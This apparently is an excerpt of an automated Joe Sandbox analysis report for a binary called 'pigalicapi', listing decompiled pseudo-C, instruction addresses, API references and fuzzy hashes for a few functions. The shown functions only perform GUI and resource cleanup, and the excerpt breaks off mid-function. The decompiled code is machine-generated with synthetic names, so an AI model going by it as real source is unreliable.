                                                                                                                                                                                                                                                                                          0x0080b103
                                                                                                                                                                                                                                                                                          0x0080b108
                                                                                                                                                                                                                                                                                          0x0080b125
                                                                                                                                                                                                                                                                                          0x0080b126
                                                                                                                                                                                                                                                                                          0x0080b12b
                                                                                                                                                                                                                                                                                          0x0080b16c
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080b16c
                                                                                                                                                                                                                                                                                          0x0080b13f
                                                                                                                                                                                                                                                                                          0x0080b166
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080b166
                                                                                                                                                                                                                                                                                          0x0080b156
                                                                                                                                                                                                                                                                                          0x0080b10a
                                                                                                                                                                                                                                                                                          0x0080b11b
                                                                                                                                                                                                                                                                                          0x0080b123
                                                                                                                                                                                                                                                                                          0x0080b16e
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080b123

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetMenuStringA.USER32(00000000,0000E110,?,00000104,00000000), ref: 0080B11B
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32((empty),?,?,00808056), ref: 0080B138
                                                                                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(?,(empty),00000104), ref: 0080B14E
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32((empty)), ref: 0080B15C
                                                                                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(?,(empty),00000001), ref: 0080B166
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: lstrcpynlstrlen$MenuString
                                                                                                                                                                                                                                                                                          • String ID: (empty)
                                                                                                                                                                                                                                                                                          • API String ID: 1190328411-3693985619
                                                                                                                                                                                                                                                                                          • Opcode ID: b116b45001fb1326fe7993236ddfc0c808e05b543ec271f7b7bf14b694544c66
                                                                                                                                                                                                                                                                                          • Instruction ID: 12feecb549bbe22259c749e853bfacf5056d6e4cdedd0dd1b2e5e991a50fc0e5
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b116b45001fb1326fe7993236ddfc0c808e05b543ec271f7b7bf14b694544c66
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 58F09035704220BBE7755B54BC19EB6337CFB88B20B40052BB561E22D0D7B8A8468A61
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 83%
                                                                                                                                                                                                                                                                                          			E00809910(intOrPtr _a4) {
                                                                                                                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                                                                                          				signed int _t46;
                                                                                                                                                                                                                                                                                          				struct HENHMETAFILE__* _t50;
                                                                                                                                                                                                                                                                                          				struct HENHMETAFILE__* _t51;
                                                                                                                                                                                                                                                                                          				void* _t53;
                                                                                                                                                                                                                                                                                          				void* _t54;
                                                                                                                                                                                                                                                                                          				void* _t55;
                                                                                                                                                                                                                                                                                          				void* _t64;
                                                                                                                                                                                                                                                                                          				intOrPtr _t85;
                                                                                                                                                                                                                                                                                          				intOrPtr _t87;
                                                                                                                                                                                                                                                                                          				intOrPtr _t91;
                                                                                                                                                                                                                                                                                          				signed int _t94;
                                                                                                                                                                                                                                                                                          				void* _t95;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_push(0xffffffff);
                                                                                                                                                                                                                                                                                          				_push(E0081F8D6);
                                                                                                                                                                                                                                                                                          				_push( *[fs:0x0]);
                                                                                                                                                                                                                                                                                          				_t46 =  *0x869060; // 0xda7e2511
                                                                                                                                                                                                                                                                                          				_push(_t46 ^ _t94);
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] =  &_v16;
                                                                                                                                                                                                                                                                                          				_t91 = _a4;
                                                                                                                                                                                                                                                                                          				_v8 = 7;
                                                                                                                                                                                                                                                                                          				_t49 =  *((intOrPtr*)(_t91 + 0x52c));
                                                                                                                                                                                                                                                                                          				if( *((intOrPtr*)(_t91 + 0x52c)) != 0) {
                                                                                                                                                                                                                                                                                          					E00815DE2(_t49);
                                                                                                                                                                                                                                                                                          					_t95 = _t95 + 4;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t91 + 0x52c)) = 0;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t91 + 0x530)) = 0;
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t91 + 0x534)) = 0;
                                                                                                                                                                                                                                                                                          				_t50 =  *(_t91 + 0x510);
                                                                                                                                                                                                                                                                                          				if(_t50 != 0) {
                                                                                                                                                                                                                                                                                          					DeleteEnhMetaFile(_t50);
                                                                                                                                                                                                                                                                                          					 *(_t91 + 0x510) = 0;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t51 =  *(_t91 + 0x4f0);
                                                                                                                                                                                                                                                                                          				if(_t51 != 0) {
                                                                                                                                                                                                                                                                                          					DeleteEnhMetaFile(_t51);
                                                                                                                                                                                                                                                                                          					 *(_t91 + 0x4f0) = 0;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				if( *((intOrPtr*)(_t91 + 0x4ec)) != 0) {
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t91 + 0x4ec)) = 0;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t52 =  *((intOrPtr*)(_t91 + 0x4d8));
                                                                                                                                                                                                                                                                                          				if( *((intOrPtr*)(_t91 + 0x4d8)) != 0) {
                                                                                                                                                                                                                                                                                          					E00815701(_t52);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t53 =  *(_t91 + 0x4bc);
                                                                                                                                                                                                                                                                                          				if(_t53 != 0) {
                                                                                                                                                                                                                                                                                          					GlobalUnlock(_t53);
                                                                                                                                                                                                                                                                                          					GlobalFree( *(_t91 + 0x4bc));
                                                                                                                                                                                                                                                                                          					 *(_t91 + 0x4bc) = 0;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t54 =  *(_t91 + 0x4b8);
                                                                                                                                                                                                                                                                                          				if(_t54 != 0) {
                                                                                                                                                                                                                                                                                          					ClosePrinter(_t54);
                                                                                                                                                                                                                                                                                          					 *(_t91 + 0x4b8) = 0;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t85 = _t91 + 0x250;
                                                                                                                                                                                                                                                                                          				_v20 = _t85;
                                                                                                                                                                                                                                                                                          				_v8 = 8;
                                                                                                                                                                                                                                                                                          				_t55 =  *(_t85 + 0x4c);
                                                                                                                                                                                                                                                                                          				if(_t55 != 0 && DeleteObject(_t55) != 0) {
                                                                                                                                                                                                                                                                                          					 *(_t85 + 0x4c) = 0;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				E00807560(_t85 + 0x24);
                                                                                                                                                                                                                                                                                          				_v8 = 4;
                                                                                                                                                                                                                                                                                          				_t86 =  *((intOrPtr*)(_t85 + 0x14));
                                                                                                                                                                                                                                                                                          				if( *((intOrPtr*)(_t85 + 0x14)) != 0) {
                                                                                                                                                                                                                                                                                          					E00815701(_t86);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t87 = _t91 + 0x224;
                                                                                                                                                                                                                                                                                          				_v20 = _t87;
                                                                                                                                                                                                                                                                                          				_v8 = 9;
                                                                                                                                                                                                                                                                                          				_push( *((intOrPtr*)(_t87 + 0x28)));
                                                                                                                                                                                                                                                                                          				E008162C2();
                                                                                                                                                                                                                                                                                          				_v8 = 3;
                                                                                                                                                                                                                                                                                          				_t88 =  *((intOrPtr*)(_t87 + 0x14));
                                                                                                                                                                                                                                                                                          				if( *((intOrPtr*)(_t87 + 0x14)) != 0) {
                                                                                                                                                                                                                                                                                          					E00815701(_t88);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t60 =  *((intOrPtr*)(_t91 + 0x108));
                                                                                                                                                                                                                                                                                          				if( *((intOrPtr*)(_t91 + 0x108)) != 0) {
                                                                                                                                                                                                                                                                                          					E00815DE2(_t60);
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t91 + 0x108)) = 0;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t91 + 0x10c)) = 0;
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t91 + 0x110)) = 0;
                                                                                                                                                                                                                                                                                          				_v8 = 1;
                                                                                                                                                                                                                                                                                          				E0080BA00(_t91 + 0x54);
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				_t64 = E00805090(_t91 + 0x3c);
                                                                                                                                                                                                                                                                                          				_v8 = 0xffffffff;
                                                                                                                                                                                                                                                                                          				_t92 =  *((intOrPtr*)(_t91 + 0x14));
                                                                                                                                                                                                                                                                                          				if( *((intOrPtr*)(_t91 + 0x14)) != 0) {
                                                                                                                                                                                                                                                                                          					_t64 = E00815701(_t92);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] = _v16;
                                                                                                                                                                                                                                                                                          				return _t64;
                                                                                                                                                                                                                                                                                          			}


















                                                                                                                                                                                                                                                                                          0x00809913
                                                                                                                                                                                                                                                                                          0x00809915
                                                                                                                                                                                                                                                                                          0x00809920
                                                                                                                                                                                                                                                                                          0x00809925
                                                                                                                                                                                                                                                                                          0x0080992c
                                                                                                                                                                                                                                                                                          0x00809930
                                                                                                                                                                                                                                                                                          0x00809936
                                                                                                                                                                                                                                                                                          0x00809939
                                                                                                                                                                                                                                                                                          0x00809940
                                                                                                                                                                                                                                                                                          0x0080994a
                                                                                                                                                                                                                                                                                          0x0080994d
                                                                                                                                                                                                                                                                                          0x00809952
                                                                                                                                                                                                                                                                                          0x00809955
                                                                                                                                                                                                                                                                                          0x00809955
                                                                                                                                                                                                                                                                                          0x00809961
                                                                                                                                                                                                                                                                                          0x00809967
                                                                                                                                                                                                                                                                                          0x0080996d
                                                                                                                                                                                                                                                                                          0x00809975
                                                                                                                                                                                                                                                                                          0x00809978
                                                                                                                                                                                                                                                                                          0x0080997a
                                                                                                                                                                                                                                                                                          0x0080997a
                                                                                                                                                                                                                                                                                          0x00809980
                                                                                                                                                                                                                                                                                          0x00809988
                                                                                                                                                                                                                                                                                          0x0080998b
                                                                                                                                                                                                                                                                                          0x0080998d
                                                                                                                                                                                                                                                                                          0x0080998d
                                                                                                                                                                                                                                                                                          0x00809999
                                                                                                                                                                                                                                                                                          0x0080999b
                                                                                                                                                                                                                                                                                          0x0080999b
                                                                                                                                                                                                                                                                                          0x008099a1
                                                                                                                                                                                                                                                                                          0x008099a9
                                                                                                                                                                                                                                                                                          0x008099ac
                                                                                                                                                                                                                                                                                          0x008099ac
                                                                                                                                                                                                                                                                                          0x008099b1
                                                                                                                                                                                                                                                                                          0x008099b9
                                                                                                                                                                                                                                                                                          0x008099bc
                                                                                                                                                                                                                                                                                          0x008099c9
                                                                                                                                                                                                                                                                                          0x008099cf
                                                                                                                                                                                                                                                                                          0x008099cf
                                                                                                                                                                                                                                                                                          0x008099d5
                                                                                                                                                                                                                                                                                          0x008099dd
                                                                                                                                                                                                                                                                                          0x008099e0
                                                                                                                                                                                                                                                                                          0x008099e6
                                                                                                                                                                                                                                                                                          0x008099e6
                                                                                                                                                                                                                                                                                          0x008099ec
                                                                                                                                                                                                                                                                                          0x008099f2
                                                                                                                                                                                                                                                                                          0x008099f5
                                                                                                                                                                                                                                                                                          0x008099f9
                                                                                                                                                                                                                                                                                          0x008099fe
                                                                                                                                                                                                                                                                                          0x00809a0b
                                                                                                                                                                                                                                                                                          0x00809a0b
                                                                                                                                                                                                                                                                                          0x00809a12
                                                                                                                                                                                                                                                                                          0x00809a17
                                                                                                                                                                                                                                                                                          0x00809a1b
                                                                                                                                                                                                                                                                                          0x00809a20
                                                                                                                                                                                                                                                                                          0x00809a23
                                                                                                                                                                                                                                                                                          0x00809a23
                                                                                                                                                                                                                                                                                          0x00809a28
                                                                                                                                                                                                                                                                                          0x00809a2e
                                                                                                                                                                                                                                                                                          0x00809a31
                                                                                                                                                                                                                                                                                          0x00809a38
                                                                                                                                                                                                                                                                                          0x00809a39
                                                                                                                                                                                                                                                                                          0x00809a3e
                                                                                                                                                                                                                                                                                          0x00809a42
                                                                                                                                                                                                                                                                                          0x00809a4a
                                                                                                                                                                                                                                                                                          0x00809a4d
                                                                                                                                                                                                                                                                                          0x00809a4d
                                                                                                                                                                                                                                                                                          0x00809a52
                                                                                                                                                                                                                                                                                          0x00809a5a
                                                                                                                                                                                                                                                                                          0x00809a5d
                                                                                                                                                                                                                                                                                          0x00809a65
                                                                                                                                                                                                                                                                                          0x00809a65
                                                                                                                                                                                                                                                                                          0x00809a6f
                                                                                                                                                                                                                                                                                          0x00809a75
                                                                                                                                                                                                                                                                                          0x00809a7b
                                                                                                                                                                                                                                                                                          0x00809a7f
                                                                                                                                                                                                                                                                                          0x00809a88
                                                                                                                                                                                                                                                                                          0x00809a8b
                                                                                                                                                                                                                                                                                          0x00809a90
                                                                                                                                                                                                                                                                                          0x00809a97
                                                                                                                                                                                                                                                                                          0x00809a9c
                                                                                                                                                                                                                                                                                          0x00809a9f
                                                                                                                                                                                                                                                                                          0x00809a9f
                                                                                                                                                                                                                                                                                          0x00809aa7
                                                                                                                                                                                                                                                                                          0x00809ab5

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • DeleteEnhMetaFile.GDI32(?), ref: 00809978
                                                                                                                                                                                                                                                                                          • DeleteEnhMetaFile.GDI32(?), ref: 0080998B
                                                                                                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(?,DA7E2511,?,?,?,?,?,0081F8D6,000000FF,?,0080982C), ref: 008099BC
                                                                                                                                                                                                                                                                                          • GlobalFree.KERNEL32 ref: 008099C9
                                                                                                                                                                                                                                                                                          • ClosePrinter.WINSPOOL.DRV(?,DA7E2511,?,?,?,?,?,0081F8D6,000000FF,?,0080982C), ref: 008099E0
                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00809A01
                                                                                                                                                                                                                                                                                            • Part of subcall function 00815DE2: HeapFree.KERNEL32(00000000,00000000,?,0081755E,00000000,?,?,00817A12,008163ED,?,?,?,0080128C,80004005), ref: 00815DF8
                                                                                                                                                                                                                                                                                            • Part of subcall function 00815DE2: GetLastError.KERNEL32(00000000,?,0081755E,00000000,?,?,00817A12,008163ED,?,?,?,0080128C,80004005), ref: 00815E0A
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Delete$FileFreeGlobalMeta$CloseErrorHeapLastObjectPrinter.Unlock
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3967346493-0
                                                                                                                                                                                                                                                                                          • Opcode ID: a84d2500aa8fa98951f555fe42a975bd4e057566ebbba1ad70ddf245d4d15ec2
                                                                                                                                                                                                                                                                                          • Instruction ID: 0f5101e99a0a13535e60aa678f68fb38e8202f94735dd6ac241579146b85ca90
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a84d2500aa8fa98951f555fe42a975bd4e057566ebbba1ad70ddf245d4d15ec2
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99518AB1900B45EBCB20DFA9DC84A9AFBE8FF44300F50492EE59AD3682C774B9448F51
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 97%
                                                                                                                                                                                                                                                                                          			E00812A90(CHAR* __eax, void* __ebx, void* __ecx, int _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				int _t40;
                                                                                                                                                                                                                                                                                          				int _t42;
                                                                                                                                                                                                                                                                                          				void* _t60;
                                                                                                                                                                                                                                                                                          				void* _t62;
                                                                                                                                                                                                                                                                                          				CHAR* _t80;
                                                                                                                                                                                                                                                                                          				CHAR* _t82;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t85;
                                                                                                                                                                                                                                                                                          				void* _t89;
                                                                                                                                                                                                                                                                                          				void* _t90;
                                                                                                                                                                                                                                                                                          				intOrPtr _t92;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t62 = __ebx;
                                                                                                                                                                                                                                                                                          				_push(__ecx);
                                                                                                                                                                                                                                                                                          				_t80 = __eax;
                                                                                                                                                                                                                                                                                          				_t40 = 0;
                                                                                                                                                                                                                                                                                          				if(__ebx == 0) {
                                                                                                                                                                                                                                                                                          					_v8 = 0;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t1 = _t62 - 0x24; // 0x0
                                                                                                                                                                                                                                                                                          					_v8 = _t1;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t4 = _t62 + 4; // 0x28
                                                                                                                                                                                                                                                                                          				_t89 = _t4;
                                                                                                                                                                                                                                                                                          				if(_t80 != _t40) {
                                                                                                                                                                                                                                                                                          					_t40 = lstrlenA(_t80);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				E00805F10(_t40, _t89, _t80);
                                                                                                                                                                                                                                                                                          				_t82 = _a4;
                                                                                                                                                                                                                                                                                          				_t6 = _t62 + 8; // 0x2c
                                                                                                                                                                                                                                                                                          				_t90 = _t6;
                                                                                                                                                                                                                                                                                          				if(_t82 != 0) {
                                                                                                                                                                                                                                                                                          					_t42 = lstrlenA(_t82);
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t42 = 0;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				E00805F10(_t42, _t90, _t82);
                                                                                                                                                                                                                                                                                          				_t85 = _v8 + 0x24;
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t62 + 0x14)) = _a8;
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t62 + 0x18)) = _a12;
                                                                                                                                                                                                                                                                                          				 *(_t62 + 0x1c) = 1;
                                                                                                                                                                                                                                                                                          				if(E008135A0( *((intOrPtr*)(_t62 + 4)), _t85, _a8) != 0 || E00812580( *((intOrPtr*)(_t62 + 0x18)),  *((intOrPtr*)(_t62 + 0x14)), _t85,  *((intOrPtr*)(_t62 + 4)),  *(_t62 + 0x1c)) != 0) {
                                                                                                                                                                                                                                                                                          					if(_t85 == 0) {
                                                                                                                                                                                                                                                                                          						_a4 = 0;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_a4 = _t85 - 0x24;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t85 + 0x24)) = SetCursor(LoadCursorA(0, 0x7f02));
                                                                                                                                                                                                                                                                                          					SendMessageA( *(_a4 + 4), 0x43f, 1, 0);
                                                                                                                                                                                                                                                                                          					_a4 = 0;
                                                                                                                                                                                                                                                                                          					do {
                                                                                                                                                                                                                                                                                          						_a4 = _a4 + 1;
                                                                                                                                                                                                                                                                                          						SendMessageA( *(_v8 + 4), 0xc2, 0,  *(_t62 + 8));
                                                                                                                                                                                                                                                                                          					} while (E00812580( *((intOrPtr*)(_t62 + 0x18)),  *((intOrPtr*)(_t62 + 0x14)), _t85,  *((intOrPtr*)(_t62 + 4)),  *(_t62 + 0x1c)) != 0);
                                                                                                                                                                                                                                                                                          					return E008136B0(_t85, _a4);
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t92 =  *((intOrPtr*)(_t62 + 4));
                                                                                                                                                                                                                                                                                          					if(_t85 == 0) {
                                                                                                                                                                                                                                                                                          						_t60 = 0;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t60 = _t85 - 0x24;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t20 = _t60 + 0x24; // 0x806d70
                                                                                                                                                                                                                                                                                          					 *(_t85 + 0x10) = 1;
                                                                                                                                                                                                                                                                                          					return E00813810(_t20, _t92);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}
















                                                                                                                                                                                                                                                                                          0x00812a90
                                                                                                                                                                                                                                                                                          0x00812a93
                                                                                                                                                                                                                                                                                          0x00812a96
                                                                                                                                                                                                                                                                                          0x00812a98
                                                                                                                                                                                                                                                                                          0x00812a9c
                                                                                                                                                                                                                                                                                          0x00812aa6
                                                                                                                                                                                                                                                                                          0x00812a9e
                                                                                                                                                                                                                                                                                          0x00812a9e
                                                                                                                                                                                                                                                                                          0x00812aa1
                                                                                                                                                                                                                                                                                          0x00812aa1
                                                                                                                                                                                                                                                                                          0x00812aa9
                                                                                                                                                                                                                                                                                          0x00812aa9
                                                                                                                                                                                                                                                                                          0x00812aae
                                                                                                                                                                                                                                                                                          0x00812ab1
                                                                                                                                                                                                                                                                                          0x00812ab1
                                                                                                                                                                                                                                                                                          0x00812aba
                                                                                                                                                                                                                                                                                          0x00812abf
                                                                                                                                                                                                                                                                                          0x00812ac2
                                                                                                                                                                                                                                                                                          0x00812ac2
                                                                                                                                                                                                                                                                                          0x00812ac7
                                                                                                                                                                                                                                                                                          0x00812ace
                                                                                                                                                                                                                                                                                          0x00812ac9
                                                                                                                                                                                                                                                                                          0x00812ac9
                                                                                                                                                                                                                                                                                          0x00812ac9
                                                                                                                                                                                                                                                                                          0x00812ad7
                                                                                                                                                                                                                                                                                          0x00812ae9
                                                                                                                                                                                                                                                                                          0x00812aed
                                                                                                                                                                                                                                                                                          0x00812af0
                                                                                                                                                                                                                                                                                          0x00812af3
                                                                                                                                                                                                                                                                                          0x00812b01
                                                                                                                                                                                                                                                                                          0x00812b44
                                                                                                                                                                                                                                                                                          0x00812b4e
                                                                                                                                                                                                                                                                                          0x00812b46
                                                                                                                                                                                                                                                                                          0x00812b49
                                                                                                                                                                                                                                                                                          0x00812b49
                                                                                                                                                                                                                                                                                          0x00812b6b
                                                                                                                                                                                                                                                                                          0x00812b7c
                                                                                                                                                                                                                                                                                          0x00812b82
                                                                                                                                                                                                                                                                                          0x00812b90
                                                                                                                                                                                                                                                                                          0x00812b99
                                                                                                                                                                                                                                                                                          0x00812ba5
                                                                                                                                                                                                                                                                                          0x00812bc0
                                                                                                                                                                                                                                                                                          0x00812bd4
                                                                                                                                                                                                                                                                                          0x00812b1c
                                                                                                                                                                                                                                                                                          0x00812b1c
                                                                                                                                                                                                                                                                                          0x00812b21
                                                                                                                                                                                                                                                                                          0x00812b28
                                                                                                                                                                                                                                                                                          0x00812b23
                                                                                                                                                                                                                                                                                          0x00812b23
                                                                                                                                                                                                                                                                                          0x00812b23
                                                                                                                                                                                                                                                                                          0x00812b2b
                                                                                                                                                                                                                                                                                          0x00812b2e
                                                                                                                                                                                                                                                                                          0x00812b3f
                                                                                                                                                                                                                                                                                          0x00812b3f

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000260,?,8189C294,00806D4C,?,00811881,5204418B,8189C294,8189C294,?,?,0080FD16,?,00806D4C,?,?), ref: 00812AB1
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,8189C294,00806D4C,?,00811881,5204418B,8189C294,8189C294,?,?,0080FD16,?,00806D4C,?,?), ref: 00812ACE
                                                                                                                                                                                                                                                                                          • LoadCursorA.USER32 ref: 00812B5C
                                                                                                                                                                                                                                                                                          • SetCursor.USER32(00000000,?,00811881), ref: 00812B63
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32 ref: 00812B7C
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32 ref: 00812BA5
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CursorMessageSendlstrlen$Load
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2433542616-0
                                                                                                                                                                                                                                                                                          • Opcode ID: fb2b4a480f30a7501e41d73987c1a5a7f5954e967818d2686a96b180c45db138
                                                                                                                                                                                                                                                                                          • Instruction ID: ee4fd39a2b1c6b0b2773cebdc05540af9d759c2eb674bc408f1db5cc281947f2
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fb2b4a480f30a7501e41d73987c1a5a7f5954e967818d2686a96b180c45db138
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DB413A75600204EFCB14DF54C984AAABBA9FF88750F148059ED09CB346EB70E9A1CBA1
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 92%
                                                                                                                                                                                                                                                                                          			E0080BA00(intOrPtr _a4) {
                                                                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                                                                                          				signed int _t35;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _t40;
                                                                                                                                                                                                                                                                                          				void* _t41;
